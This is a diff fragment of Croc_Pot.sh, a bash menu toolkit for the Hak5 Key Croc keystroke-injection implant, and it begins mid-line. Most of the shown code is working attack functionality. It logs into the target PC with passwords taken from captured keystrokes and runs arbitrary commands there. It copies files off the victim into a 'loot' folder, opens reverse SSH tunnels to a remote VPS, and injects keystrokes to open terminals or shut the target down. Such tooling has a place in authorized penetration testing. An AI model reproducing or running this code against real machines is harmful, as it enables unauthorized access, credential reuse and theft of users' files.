root@keycroc IP\e[0m\e[40;93m +-->ssh -fN -R port#:localhost:22 root@keycroc IP -Keycroc side will be setup with this below --\e[40;32mssh PC-username@localhost -p port#\e[0m')\n\n" +-->ssh PC-username@localhost -p port#')\n" echo -ne "$(ColorYellow 'Found save Passwd try this:') $(target_pw)\n" start_shell() { if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then @@ -4870,10 +6822,10 @@ parrot) start_shell ;; esac fi ;; - [nN] | [nN][oO]) - echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; - *) - invalid_entry ; shell_pc ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; shell_pc ;; esac else echo -ne "\t$(ColorYellow 'PLEASE RUN CROC_POT_PAYLOAD.TXT TO GET TARGET IP/USERNAME')\n" @@ -4884,7 +6836,8 @@ fi ## ssh_tunnel() { clear - echo -ne "$(Info_Screen '-Start a Reverse SSH Tunnel Keycroc to remote-server + echo -ne "$(Info_Screen ' +-Start a Reverse SSH Tunnel Keycroc to remote-server -Remotely access keycroc from a remote-server VPS -Keycroc will be setup with these setting below -\e[40;32mssh -fN -R port#:localhost:22 root@remote-server-ip\e[0m\e[40;93m @@ -4924,60 +6877,166 @@ fi ;; esac } ## +#----SSH Copy a Local File to a Remote System with the scp Command +## +remote_file() { + local TARGET_USERNAME=$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt) + clear + echo -ne "$(Info_Screen ' +-Copy a Local File to a Remote System with the scp Command +-Example +-scp path/to/local/file.ext remote_username@remote_IP:path/to/remote/file.ext +-Copy a Remote File to a Local System using the scp Command +-Example +-scp remote_username@remote_IP:path/to/remote/file.ext path/to/local/file.ext')\n\n" +## +#----SSH send Remote File keycroc to target pc +## +keycroc_target() { + clear + echo -ne "$(Info_Screen ' +-Send file from keycroc to target pc +-Save to target pc home')\n\n" + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FULL PATH OF FILE TO SEND + if [ -e "${r_a}" ]; then + sshpass -p $(target_pw) scp -o "StrictHostKeyChecking no" ${r_a} ${TARGET_USERNAME}@$(os_ip):~/ + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi +} +## +#----SSH Receive Remote File target pc to keycroc +## +target_keycroc() { + clear + echo -ne "$(Info_Screen ' +-Receive file from target pc to keycroc +-Save to keycroc loot/Croc_Pot +-Will need to know the path of file on target pc')\n\n" + sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" ${TARGET_USERNAME}@$(os_ip) 'cd / ; for i in `ls -d */` ; do g=`sudo find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done' + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + sshpass -p $(target_pw) ssh ${TARGET_USERNAME}@$(os_ip) 'find /'${r_f}' -type f -name "*.*"' + read_all ENTER THE FULL PATH OF FILE TO RECEIVE + sshpass -p $(target_pw) ssh ${TARGET_USERNAME}@$(os_ip) 'test -e '${r_a}'' + if [ $? -eq 0 ]; then + sshpass -p $(target_pw) scp ${TARGET_USERNAME}@$(os_ip):${r_a} /root/udisk/loot/Croc_Pot + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi +} +## +#----SSH send Remote File by enter target credentials host_name/host_ip +## +user_file() { + clear + echo -ne "$(Info_Screen ' +-Send file from keycroc to remote host +-Save to remote host home')\n\n" +read_all ENTER REMOTE HOST IP ; local r_h=${r_a} +if [[ ${r_h} =~ ${validate_ip} ]]; then +ping -q -c 1 -w 1 ${r_h} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${red}Unable to reach host${clear}\n" + elif [[ "${#args[@]}" -eq 0 ]]; then + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FULL PATH OF FILE TO SEND ; local c_f=${r_a} + if [ -e "${c_f}" ]; then + read_all ENTER REMOTE HOST_NAME ; local r_n=${r_a} + scp -o "StrictHostKeyChecking no" ${c_f} ${r_n}@${r_h}:~/ + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi + fi +else + echo -ne "${red}Not a valid ip address${clear}\n" ; invalid_entry +fi +} +## +#----SSH Receive Remote File from remote target/host +## +remote_host() { + clear + echo -ne "$(Info_Screen ' +-Receive file from remote host to keycroc +-Save to keycroc loot/Croc_Pot +-Will need to know the path of file on remote host')\n\n" + read_all ENTER REMOTE HOST IP ; local r_h=${r_a} +if [[ ${r_h} =~ ${validate_ip} ]]; then +ping -q -c 1 -w 1 ${r_h} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${red}Unable to reach host${clear}\n" + elif [[ "${#args[@]}" -eq 0 ]]; then + read_all ENTER REMOTE HOST_NAME ; local r_n=${r_a} + ssh -o "StrictHostKeyChecking no" ${r_n}@${r_h} 'cd / ; for i in `ls -d */` ; do g=`sudo find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done' + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + ssh ${r_n}@${r_h} 'find /'${r_f}' -type f -name "*.*"' + read_all ENTER THE FULL PATH OF FILE TO RECEIVE + ssh ${r_n}@${r_h} 'test -e '${r_a}'' + if [ $? -eq 0 ]; then + scp ${r_n}@${r_h}:${r_a} /root/udisk/loot/Croc_Pot + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi + fi +else + echo -ne "${red}Not a valid ip address${clear}\n" ; invalid_entry +fi +} +## +#----SSH Remote File with scp Command menu +## +MenuTitle REMOTE FILE MENU ; MenuColor 21 1 KEYCROC TO TARGET PC ; MenuColor 21 2 TARGET PC TO KEYCROC ; MenuColor 21 3 SEND TO REMOTE HOST ; MenuColor 21 4 RECEIVE REMOTE HOST ; MenuColor 21 5 RETURN TO MAIN MENU ; MenuEnd 24 + case $m_a in + 1) keycroc_target ; remote_file ;; 2) target_keycroc ; remote_file ;; 3) user_file ; remote_file ;; 4) remote_host ; remote_file ;; 5) main_menu ;; 0) exit 0 ;; [bB]) croc_reverse_shell ;; *) invalid_entry ; remote_file ;; + esac +} +## #----SSH Execute a remote command on a host over SSH ## remote_command() { clear - echo -ne "$(Info_Screen '-Execute a remote command on a host over SSH + echo -ne "$(Info_Screen ' +-Execute a remote command on a host over SSH -Example ssh root@192.168.1.1 uptime -ssh USER@HOST COMMAND1; COMMAND2; COMMAND3 or -ssh USER@HOST COMMAND1 | COMMAND2 | COMMAND3 -SSH between remote hosts and get back the output')\n\n" target_command() { - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND - ssh ${1}@${@:2} ${USER_COMMAND} + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh -o "StrictHostKeyChecking no" ${1}@${@:2} ''${USER_COMMAND}'' sleep 5 } input_command() { - echo -ne "$(ColorBlue 'ENTER TARGET USRNAME AND PRESS [ENTER]'): "; read USERNAME_COMMAND - echo -ne "$(ColorBlue 'ENTER TARGET IP AND PRESS [ENTER]'): "; read IP_COMMAND - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND - ssh ${USERNAME_COMMAND}@${IP_COMMAND} ${USER_COMMAND} + read_all ENTER TARGET USERNAME AND PRESS [ENTER] ; local USERNAME_COMMAND=${r_a} + read_all ENTER TARGET IP AND PRESS [ENTER] ; local IP_COMMAND=${r_a} + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh -o "StrictHostKeyChecking no" ${USERNAME_COMMAND}@${IP_COMMAND} ''${USER_COMMAND}'' sleep 5 } pc_target_command() { - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then - sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ${USER_COMMAND} + sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ''${USER_COMMAND}'' sleep 5 else - ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ${USER_COMMAND} + ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ''${USER_COMMAND}'' sleep 5 fi } +## +#----SSH remote command Menu +## command_menu() { -MenuTitle REMOTE COMMAND MENU -MenuColor 1 COMMAND TO TARGET PC ; echo -ne " ${clear}\n" -MenuColor 2 USERNAME/IP AND COMMAND ; echo -ne " ${clear}\n" -MenuColor 3 COMMAND TO PINEAPPLE ; echo -ne " ${clear}\n" -MenuColor 4 COMMAND TO SQUIRREL ; echo -ne " ${clear}\n" -MenuColor 5 COMMAND TO TURTLE ; echo -ne " ${clear}\n" -MenuColor 6 COMMAND TO SHARK ; echo -ne " ${clear}\n" -MenuColor 7 COMMAND TO BUNNY ; echo -ne " ${clear}\n" -MenuColor 8 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REMOTE COMMAND MENU ; MenuColor 24 1 COMMAND TO TARGET PC ; MenuColor 24 2 USERNAME/IP AND COMMAND ; MenuColor 24 3 COMMAND TO SQUIRREL +MenuColor 24 4 COMMAND TO TURTLE ; MenuColor 24 5 COMMAND TO SHARK ; MenuColor 24 6 COMMAND TO BUNNY ; MenuColor 24 7 RETURN TO MAIN MENU ; MenuEnd 27 case $m_a in - 1) pc_target_command ; command_menu ;; - 2) input_command ; command_menu ;; - 3) target_command root 172.16.42.1 ; command_menu ;; - 4) target_command root 172.16.32.1 ; command_menu ;; - 5) target_command root 172.16.84.1 ; command_menu ;; - 6) target_command root ${IP_F} ; command_menu ;; - 7) target_command root localhost -p 7000 ; command_menu ;; - 8) main_menu ;; - 0) exit 0 ;; - [bB]) croc_reverse_shell ;; - *) invalid_entry ; remote_command ;; + 1) pc_target_command ; command_menu ;; 2) input_command ; command_menu ;; 3) target_command root 172.16.32.1 ; command_menu ;; 4) target_command root 172.16.84.1 ; command_menu ;; + 5) shark_check ; target_command root ${DEFAULT_IP} ; command_menu ;; 6) target_command root localhost -p 7000 ; command_menu ;; 7) main_menu ;; 0) exit 0 ;; [bB]) croc_reverse_shell ;; *) invalid_entry ; remote_command ;; esac } command_menu @@ -4985,26 +7044,11 @@ command_menu ## #----SSH croc reverse shell Menu ## -MenuTitle REVERSE SSH TUNNEL MENU -MenuColor 1 REVERSE TUNNEL NETCAT ; echo -ne " ${clear}\n" -MenuColor 2 CROC LISTENING ; echo -ne " ${clear}\n" -MenuColor 3 REVERSE TUNNEL PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 4 REVERSE TUNNEL TARGET PC ; echo -ne " ${clear}\n" -MenuColor 5 REVERSE TUNNEL VPS ; echo -ne " ${clear}\n" -MenuColor 6 REMOTE COMMANDS TARGETS ; echo -ne " ${clear}\n" -MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REVERSE SSH TUNNEL MENU ; MenuColor 24 1 REVERSE TUNNEL NETCAT ; MenuColor 24 2 CROC LISTENING ; MenuColor 24 3 REVERSE TUNNEL PAYLOAD ; MenuColor 24 4 REVERSE TUNNEL TARGET PC ; MenuColor 24 5 REVERSE TUNNEL VPS +MenuColor 24 6 REMOTE COMMANDS TARGETS ; MenuColor 24 7 SEND FILE WITH SCP ; MenuColor 24 8 RETURN TO MAIN MENU ; MenuEnd 27 case $m_a in - 1) remote_listener ; croc_reverse_shell ;; - 2) croc_listener ; croc_reverse_shell ;; - 3) reverse_payload ; croc_reverse_shell ;; - 4) shell_pc ; croc_reverse_shell ;; - 5) ssh_tunnel ; croc_reverse_shell ;; - 6) remote_command ;; - 7) main_menu ;; - 0) exit 0 ;; - [bB]) ssh_menu ;; - *) invalid_entry ; croc_reverse_shell ;; + 1) remote_listener ; croc_reverse_shell ;; 2) croc_listener ; croc_reverse_shell ;; 3) reverse_payload ; croc_reverse_shell ;; 4) shell_pc ; croc_reverse_shell ;; 5) ssh_tunnel ; croc_reverse_shell ;; + 6) remote_command ;; 7) remote_file ;; 8) main_menu ;; 0) exit 0 ;; [bB]) ssh_menu ;; *) invalid_entry ; croc_reverse_shell ;; esac } ## @@ -5012,7 +7056,8 @@ MenuEnd ## remove_sshkey() { clear - echo -ne "$(Info_Screen '-Add correct host key in /root/.ssh/known_hosts to get rid of this message + echo -ne "$(Info_Screen ' +-Add correct host key in /root/.ssh/known_hosts to get rid of this message -remove with: ssh-keygen -f "/root/.ssh/known_hosts" -R IP -Just add the IP to remove ssh-keygen')\n\n" read_all REMOVE SSH_KEYGEN FOR PACIFIC IP Y/N AND PRESS [ENTER] @@ -5030,33 +7075,18 @@ esac #----SSH Menu ## LED B -echo -ne "\n" ; MenuTitle CROC POT SSH MENU | tr '\n' '\t' ; echo -ne "\n" -echo -ne "\t\t" ; MenuColor 1 SSH TARGET PC | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 8 SIGNAL OWL | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 2 SSH USER INPUT | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 9 SHARK JACK | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 3 ENABLE_SSH | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 10 BASH BUNNY | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 4 DISABLE_SSH | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 11 REVERSE SHELL | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 5 WIFI PINEAPPLE | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 12 PUBLIC/PRIVATE KEY | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 6 PACKET SQUIRREL | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 13 REMOVE SSH_KEYGEN | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 7 LAN TURTLE | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 14 RETURN TO MAIN MENU | tr -d '\t' ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle CROC POT SSH MENU +echo -ne "\t\t" ; MenuColor 18 1 SSH TARGET PC | tr -d '\t\n' ; MenuColor 20 8 SIGNAL OWL | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 2 SSH USER INPUT | tr -d '\t\n' ; MenuColor 20 9 SHARK JACK | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 3 ENABLE_SSH | tr -d '\t\n' ; MenuColor 19 10 BASH BUNNY | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 4 DISABLE_SSH | tr -d '\t\n' ; MenuColor 19 11 REVERSE SHELL | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 5 WIFI PINEAPPLE MK7 | tr -d '\t\n' ; MenuColor 19 12 PUBLIC/PRIVATE KEY | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 6 PACKET SQUIRREL | tr -d '\t\n' ; MenuColor 19 13 REMOVE SSH_KEYGEN | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 7 LAN TURTLE | tr -d '\t\n' ; MenuColor 18 14 RETURN TO MAIN MENU | tr -d '\t' +MenuEnd 23 case $m_a in - 1) pc_ssh ; ssh_menu ;; - 2) userinput_ssh ; ssh_menu ;; - 3) ENABLE_SSH ; ssh_menu ;; - 4) DISABLE_SSH ; ssh_menu ;; - 5) ssh_pineapple ; ssh_menu ;; - 6) ssh_squirrel ; ssh_menu ;; - 7) ssh_turtle ; ssh_menu ;; - 8) ssh_owl ; ssh_menu ;; - 9) ssh_shark ; ssh_menu ;; - 10) ssh_bunny ; ssh_menu ;; - 11) croc_reverse_shell ; ssh_menu ;; - 12) ssh_keygen ; ssh_menu ;; - 13) remove_sshkey ; ssh_menu ;; - 14) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; ssh_menu ;; + 1) pc_ssh ; ssh_menu ;; 2) echo -ne "${yellow}Reachable target on local network:${clear}\n" ; reachable_target ; userinput_ssh ; ssh_menu ;; 3) ENABLE_SSH ; ssh_menu ;; 4) DISABLE_SSH ; ssh_menu ;; 5) ssh_pineapple ;; 6) ssh_squirrel ; ssh_menu ;; 7) ssh_turtle ; ssh_menu ;; + 8) ssh_owl ; ssh_menu ;; 9) ssh_shark ; ssh_menu ;; 10) ssh_bunny ; ssh_menu ;; 11) croc_reverse_shell ; ssh_menu ;; 12) ssh_keygen ; ssh_menu ;; 13) remove_sshkey ; ssh_menu ;; 14) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; ssh_menu ;; esac } ## @@ -5064,7 +7094,8 @@ MenuEnd ## function croc_recovery() { clear - echo -ne "$(Info_Screen '-Download The lastest firmware from Hak5 + echo -ne "$(Info_Screen ' +-Download The lastest firmware from Hak5 -This will save the Firmware to the keycroc tools folder -Restore the keycroc firmware with the lastest firmware -factory recovery will bring you to Hak5 factory recovery web page @@ -5074,7 +7105,8 @@ function croc_recovery() { ## croc_firmware() { clear - echo -ne "$(Info_Screen '-This will Download KeyCroc lastest firmware from Hak5 + echo -ne "$(Info_Screen ' +-This will Download KeyCroc lastest firmware from Hak5 -Download center and place it in the tools folder -for later recovery, Download may take some time')\n" if [ -e /root/udisk/tools/kc_fw_1.3_510.tar.gz ]; then @@ -5093,72 +7125,28 @@ esac fi } ## -#----hak5 factory recovery function -## -hak_factory() { - echo -ne "\n$(ColorYellow 'Open Hak5 factory recovery web page')\n" -if [ "$(OS_CHECK)" = WINDOWS ]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; - esac -fi -} -## #----Restore lastest firmware function ## restore_firmware() { clear unset r_a echo -ne "\n$(ColorRed 'THIS WILL RESTORE THE KEYCROC TO THE LATEST FIRMWARE\n - ARE YOU SURE Y/N AND PRESS [ENTER]:')"; read r_a + ARE YOU SURE Y/N AND PRESS [ENTER]:')"; read -p $(echo -ne "\e[30;42m") r_a && echo -ne "${clear}" case $r_a in - [yY] | [yY][eE][sS]) +[yY] | [yY][eE][sS]) if [ -e /root/udisk/tools/kc_fw_1.3_510.tar.gz ]; then - echo -ne "$(ColorYellow 'Moving Firmware to KeyCroc udisk - This will take an couple of minutes')\n" - cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk - echo -ne "$(ColorGreen 'You can now unplug the KeyCroc and plug back in')\n" + echo -ne "$(ColorYellow 'Moving Firmware to KeyCroc udisk + This will take an couple of minutes')\n" + cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk + echo -ne "$(ColorGreen 'You can now unplug the KeyCroc and plug back in')\n" else echo -ne "$(ColorRed 'DID NOT FIND KEYCROC FIRMWARE FILE PLEASE DOWNLOAD')\n" fi ;; - [nN] | [nN][oO]) - echo -ne "\n$(ColorYellow 'Returning back to menu')\n" - croc_recovery ;; - *) - invalid_entry ; restore_firmware ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Returning back to menu')\n" + croc_recovery ;; +*) + invalid_entry ; restore_firmware ;; esac } ## @@ -5166,7 +7154,8 @@ esac ## locale_en_US() { clear - echo -ne "\n$(Info_Screen '--This will fix LC_ALL=en_US.UTF-8 if you get this error at ssh + echo -ne "\n$(Info_Screen ' +--This will fix LC_ALL=en_US.UTF-8 if you get this error at ssh --bash: warning: setlocale: LC_ALL: cannot change locale en_US.UTF-8 --This is for US language --Not sure if this will work on other language keyboards')\n\n" @@ -5191,23 +7180,24 @@ esac ## remove_croc_pot() { clear - echo -ne "\n$(Info_Screen '-Completely remove Croc_Pot and all its contents from the KeyCroc')\n\n" - echo -ne "$(ColorRed 'ARE YOU SURE TO REMOVE CROC_POT TYPE YES OR NO AND PRESS [ENTER]:')"; read CROC_POT_REMOVE + echo -ne "\n$(Info_Screen ' +-Completely remove Croc_Pot and all its contents from the KeyCroc')\n\n" + echo -ne "$(ColorRed 'ARE YOU SURE TO REMOVE CROC_POT TYPE YES OR NO AND PRESS [ENTER]:')"; read -p $(echo -ne "\e[30;42m") CROC_POT_REMOVE && echo -ne "${clear}" case $CROC_POT_REMOVE in [yY] | [yY][eE][sS]) - apt -y remove unzip openvpn mc nmon sshpass screenfetch whois dnsutils sslscan + apt -y remove unzip openvpn mc nmon sshpass screenfetch whois dnsutils sslscan speedtest-cli host hping3 stunnel ike-scan rm -r /var/hak5c2 /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot/Bunny_Payload_Shell /root/udisk/tools/Croc_Pot rm /usr/local/bin/c2-3.1.2_armv7_linux /etc/systemd/system/hak5.service /root/udisk/payloads/Getonline_Linux.txt - rm /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk/payloads/Croc_Pot_Payload.txt - rm /root/udisk/payloads/Croc_unlock_1.txt /root/udisk/payloads/Croc_unlock_2.txt - rm /root/udisk/payloads/Getonline_Raspberry.txt /root/udisk/payloads/Quick_Start_C2.txt + rm /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk/payloads/Croc_Pot_Payload.txt /root/udisk/payloads/Croc_Bite.txt.txt + rm /root/udisk/payloads/Croc_unlock_1.txt /root/udisk/payloads/Croc_unlock_2.txt /root/udisk/payloads/No_Sleeping.txt + rm /root/udisk/payloads/Getonline_Raspberry.txt /root/udisk/payloads/Quick_Start_C2.txt /root/udisk/payloads/Croc_replace.txt rm /root/udisk/payloads/Quick_start_Croc_Pot.txt /root/udisk/payloads/Getonline_Windows.txt rm /root/udisk/tools/Croc_Pot/Croc_OS.txt /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt rm /root/udisk/tools/Croc_Pot.sh /root/udisk/payloads/Croc_Shot.txt /root/udisk/payloads/Croc_Shell.txt apt-get autoremove exit 0 ;; [nN] | [nN][oO]) - echo -e "\n$(ColorYellow 'Return Back to main menu')" ;; + echo -e "\n$(ColorYellow 'Return Back to main menu')" ; main_menu ;; *) invalid_entry ; remove_croc_pot esac @@ -5217,7 +7207,8 @@ esac ## croc_update() { clear - echo -ne "$(Info_Screen '-Update/Upgrade your KeyCroc Packages + echo -ne "$(Info_Screen ' +-Update/Upgrade your KeyCroc Packages -NOTE: This could break important Packages the keycroc needs to work properly')\n\n" read_all UPDATE KEYCROC PACKAGES Y/N AND PRESS [ENTER] case $r_a in @@ -5235,7 +7226,8 @@ esac ## reboot_shutdown() { clear - echo -ne "$(Info_Screen '-Reboot or shutdown Target pc')\n\n" + echo -ne "$(Info_Screen ' +-Reboot or shutdown Target pc')\n\n" shutdown_pc() { if [ "$(OS_CHECK)" = WINDOWS ]; then Q GUI d @@ -5319,47 +7311,19 @@ fi ## #----Recovery Reboot/Shutdown menu ## -MenuTitle REBOOT/SHUTDOWN TARGET PC -MenuColor 1 SHUTDOWN TARGET PC ; echo -ne " ${clear}\n" -MenuColor 2 REBOOT TARGET PC ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REBOOT/SHUTDOWN TARGET PC ; MenuColor 19 1 SHUTDOWN TARGET PC ; MenuColor 19 2 REBOOT TARGET PC ; MenuColor 19 3 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) shutdown_pc ;; - 2) reboot_pc ;; - 3) main_menu ;; - 0) exit 0 ;; - [bB]) croc_recovery ;; - *) invalid_entry ; reboot_shutdown ;; + 1) shutdown_pc ;; 2) reboot_pc ;; 3) main_menu ;; 0) exit 0 ;; [bB]) croc_recovery ;; *) invalid_entry ; reboot_shutdown ;; esac } ## #----Recovery menu ## -MenuTitle KEYCROC RECOVERY MENU -MenuColor 1 DOWNLOAD LATEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 2 FACTORY RESET HOW TO ; echo -ne " ${clear}\n" -MenuColor 3 RESTORE LASTEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 4 REMOVE LASTEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 5 REPAIR en_US.UTF-8 ERROR ; echo -ne " ${clear}\n" -MenuColor 6 KEYCROC UPDATE PACKAGES ; echo -ne " ${clear}\n" -MenuColor 7 REMOVE CROC_POT AN CONTENTS ; echo -ne " ${clear}\n" -MenuColor 8 REBOOT/SHUTDOWN TARGET PC ; echo -ne " ${clear}\n" -MenuColor 9 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle KEYCROC RECOVERY MENU ; MenuColor 27 1 DOWNLOAD LATEST FIRMWARE ; MenuColor 27 2 FACTORY RESET HOW TO ; MenuColor 27 3 RESTORE LASTEST FIRMWARE ; MenuColor 27 4 REMOVE LASTEST FIRMWARE ; MenuColor 27 5 REPAIR en_US.UTF-8 ERROR +MenuColor 27 6 KEYCROC UPDATE PACKAGES ; MenuColor 27 7 REMOVE CROC_POT AN CONTENTS ; MenuColor 27 8 REBOOT/SHUTDOWN TARGET PC ; MenuColor 27 9 RETURN TO MAIN MENU ; MenuEnd 30 case $m_a in - 1) croc_firmware ; croc_recovery ;; - 2) hak_factory ; croc_recovery ;; - 3) restore_firmware ; croc_recovery ;; - 4) echo -ne "\n$(ColorYellow 'Removing lastest firmware file from tools folder')\n" ; rm /root/udisk/tools/kc_fw_1.3_510.tar.gz ; croc_recovery ;; - 5) locale_en_US ; croc_recovery ;; - 6) croc_update ; croc_recovery ;; - 7) remove_croc_pot ;; - 8) reboot_shutdown ; croc_recovery ;; - 9) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; croc_recovery ;; + 1) croc_firmware ; croc_recovery ;; 2) start_web https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset ; croc_recovery ;; 3) restore_firmware ; croc_recovery ;; 4) echo -ne "\n$(ColorYellow 'Removing lastest firmware file from tools folder')\n" ; rm /root/udisk/tools/kc_fw_1.3_510.tar.gz ; croc_recovery ;; + 5) locale_en_US ; croc_recovery ;; 6) croc_update ; croc_recovery ;; 7) remove_croc_pot ;; 8) reboot_shutdown ; croc_recovery ;; 9) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; croc_recovery ;; esac } ## @@ -5367,7 +7331,8 @@ MenuEnd ## function hak_cloud() { clear - echo -ne "$(Info_Screen '-Run HAK5 Cloud C2 on the keycroc + echo -ne "$(Info_Screen ' +-Run HAK5 Cloud C2 on the keycroc -When running setup, maximize your screen to read Token keys properly -To get Token keys Run #3 RELOAD HAK5 C2 until the keys show up -May need to Unplug the keycroc plug back in and try again @@ -5382,18 +7347,15 @@ cloud_setup() { read_all DOWNLOAD AND INSTALL CLOUD C2 AND UNZIP Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - local status_zip="$(dpkg-query -W --showformat='${db:Status-Status}' "unzip" 2>&1)" -if [ ! $? = 0 ] || [ ! "$status_zip" = installed ]; then - apt -y install unzip -fi + install_package unzip UNZIP cloud_setup hak_cloud ## #----Hak5 Cloud_C2 download and install ## if [ -e /var/hak5c2 ]; then - echo -ne "\t\t${LINE_}$(ColorYellow 'HAK5 C2 is already installed on the keycroc')${LINE_}\n" + echo -ne "\t${LINE_}$(ColorYellow 'HAK5 C2 is already installed on the keycroc')${LINE_}\n" hak_cloud else - echo -ne "\n\t\t${LINE_}$(ColorGreen 'Installing HAK5 C2 on the keycroc')${LINE_}\n" + echo -ne "\n\t${LINE_}$(ColorGreen 'Installing HAK5 C2 on the keycroc')${LINE_}\n" sleep 3 wget https://c2.hak5.org/download/community -O /tmp/community && unzip /tmp/community -d /tmp sleep 5 @@ -5406,9 +7368,9 @@ ExecStart=/usr/local/bin/c2-3.1.2_armv7_linux -hostname $(ifconfig wlan0 | grep sleep 5 systemctl status hak5.service sleep 5 - echo -ne "\t\t${LINE_}$(ColorGreen 'HAK-5 Cloud C2 Installed, Starting C2 web UI')${LINE_}" + echo -ne "\t${LINE_}$(ColorGreen 'HAK-5 Cloud C2 Installed, Starting C2 web UI')${LINE_}" sleep 5 - start_web + cloud_web fi ;; [nN] | [nN][oO]) 